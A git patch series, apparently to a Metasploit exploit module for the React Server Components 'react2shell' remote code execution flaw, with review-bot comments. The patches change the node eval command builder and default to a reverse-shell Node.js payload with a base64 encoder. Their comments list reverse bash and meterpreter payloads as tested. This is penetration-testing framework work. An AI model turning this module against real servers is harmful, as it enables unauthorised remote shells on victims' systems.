From ca2ac75e16430c5b73e8021f9b9d33c58f1295ce Mon Sep 17 00:00:00 2001
From: Jack Heysel
Date: Fri, 12 Dec 2025 15:22:34 -0800
Subject: [PATCH 1/3] Change react2shell default encoder
---
 lib/msf/core/payload/nodejs.rb | 2 +-
 .../multi/http/react2shell_unauth_rce_cve_2025_55182.rb | 8 +++++---
 2 files changed, 6 insertions(+), 4 deletions(-)
diff --git a/lib/msf/core/payload/nodejs.rb b/lib/msf/core/payload/nodejs.rb
index 89190672acf88..296186bc41519 100644
--- a/lib/msf/core/payload/nodejs.rb
+++ b/lib/msf/core/payload/nodejs.rb
@@ -85,6 +85,6 @@ def nodejs_reverse_tcp(opts={})
 # @param [String] code the javascript code to run
 # @return [String] a command that invokes "node" and passes the code
 def nodejs_cmd(code)
- "node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'"
+ "node -e 'eval(\"#{code.gsub(/[^a-zA-Z0-9\s]/) { |char| Rex::Text.to_hex(char, '\\x') }}\");'"
 end
 end
diff --git a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
index 695b4a1994baa..9fd9d78c3c319 100644
--- a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
+++ b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
@@ -32,7 +32,7 @@ def initialize(info = {})
 ['URL', 'https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components'],
 ['URL', 'https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3']
 ],
- 'Platform' => ['multi'],
+ 'Platform' => %w[unix linux win],
 'Arch' => [ARCH_CMD],
 'Targets' => [
 [
@@ -40,8 +40,9 @@ def initialize(info = {})
 {
 'Platform' => ['unix', 'linux'],
 'DefaultOptions' => {
- 'FETCH_COMMAND' => 'WGET'
+ 'PAYLOAD' => 'cmd/unix/reverse_nodejs'
 }
+ # Tested with cmd/unix/reverse_nodejs
 # Tested with cmd/unix/reverse_bash
 # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
 }
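Review bot: The character class in the new `nodejs_cmd` line exempts `\s`, so tabs, carriage returns and newlines in `code` are now copied raw into the double-quoted string handed to `eval`, where the removed line hex-escaped every byte. A JavaScript string literal cannot contain an unescaped line terminator, so a caller passing multi-line code would now get a syntax error; whether every caller flattens its code first is not visible in this hunk. Exempting only the literal space keeps the shorter output without that regression: `code.gsub(/[^a-z0-9 ]/i) { |char| Rex::Text.to_hex(char, '\\x') }`. The PATCH 2/3 hunk for this file keeps the same `\s` exemption, and because the helper sits in a shared payload file the `@return` comment should state which characters are left unescaped.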
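Review bot: The context comment `# Tested with cmd/linux/http/x64/meterpreter/reverse_tcp` is kept unchanged while the hunk removes the `'FETCH_COMMAND' => 'WGET'` default that this target carried when the comment was presumably written. If that payload was not re-tested with the default removed, the comment now overstates coverage. Either re-test or record the option that was used, e.g. `# Tested with cmd/linux/http/x64/meterpreter/reverse_tcp (FETCH_COMMAND=WGET)`. The target hash and `initialize` both continue outside the hunk.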
@@ -55,7 +56,8 @@ def initialize(info = {})
 ],
 ],
 'Payload' => {
- 'BadChars' => '"'
+ 'BadChars' => '"',
+ 'Encoder' => 'cmd/base64'
 },
 'DefaultTarget' => 0,
 'DisclosureDate' => '2025-12-03',
From ff188b8a5efeb19a56c6409558851cfb5d2ed167 Mon Sep 17 00:00:00 2001
From: jheysel-r7
Date: Mon, 15 Dec 2025 08:08:54 -0800
Subject: [PATCH 2/3] Update regex
Co-authored-by: Julien Voisin
---
 lib/msf/core/payload/nodejs.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/msf/core/payload/nodejs.rb b/lib/msf/core/payload/nodejs.rb
index 296186bc41519..8080f3642ad07 100644
--- a/lib/msf/core/payload/nodejs.rb
+++ b/lib/msf/core/payload/nodejs.rb
@@ -85,6 +85,6 @@ def nodejs_reverse_tcp(opts={})
 # @param [String] code the javascript code to run
 # @return [String] a command that invokes "node" and passes the code
 def nodejs_cmd(code)
- "node -e 'eval(\"#{code.gsub(/[^a-zA-Z0-9\s]/) { |char| Rex::Text.to_hex(char, '\\x') }}\");'"
+ "node -e 'eval(\"#{code.gsub(/[^a-z0-9\s]/i) { |char| Rex::Text.to_hex(char, '\\x') }}\");'"
 end
 end
From 0589121fb93d3d4d6cef30312dcd798c9b4b88af Mon Sep 17 00:00:00 2001
From: Jack Heysel
Date: Mon, 15 Dec 2025 13:46:15 -0800
Subject: [PATCH 3/3] Update payload options
---
 .../multi/http/react2shell_unauth_rce_cve_2025_55182.rb | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
index 9fd9d78c3c319..6d6fa41ef2e42 100644
--- a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
+++ b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
@@ -57,6 +57,8 @@ def initialize(info = {})
 ],
 'Payload' => {
 'BadChars' => '"',
+ 'Space' => 131068,
+ 'DisableNops' => true,
 'Encoder' => 'cmd/base64'
 },
 'DefaultTarget' => 0,
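Review bot: Nothing in the `'Payload'` hash says why `'Encoder' => 'cmd/base64'` is pinned, and an unexplained pin is easy to remove later as if it were a leftover. The likely reason is visible elsewhere in this patch: `nodejs_cmd` wraps its code in `eval(\"…\")` and `"` is listed in `'BadChars'`, so the new default payload presumably cannot pass unencoded. A one-line comment such as `# the default nodejs payload contains '"' (a bad char), so an encoder is always required` would record that, once the reason is confirmed. `initialize` starts and ends outside the hunk.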
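Review bot: `'Space' => 131068` in the PATCH 3/3 hunk is an unexplained magic number. It equals 128 KiB minus 4, which suggests a size limit on the receiving side, but the hunk does not say which limit or what the 4 bytes account for. Write it with a separator and its origin, e.g. `'Space' => 131_068, # 128 KiB - 4; <source of the limit>`, and add a short comment on why `'DisableNops'` is set for an `ARCH_CMD` module. `initialize` starts and ends outside the hunk.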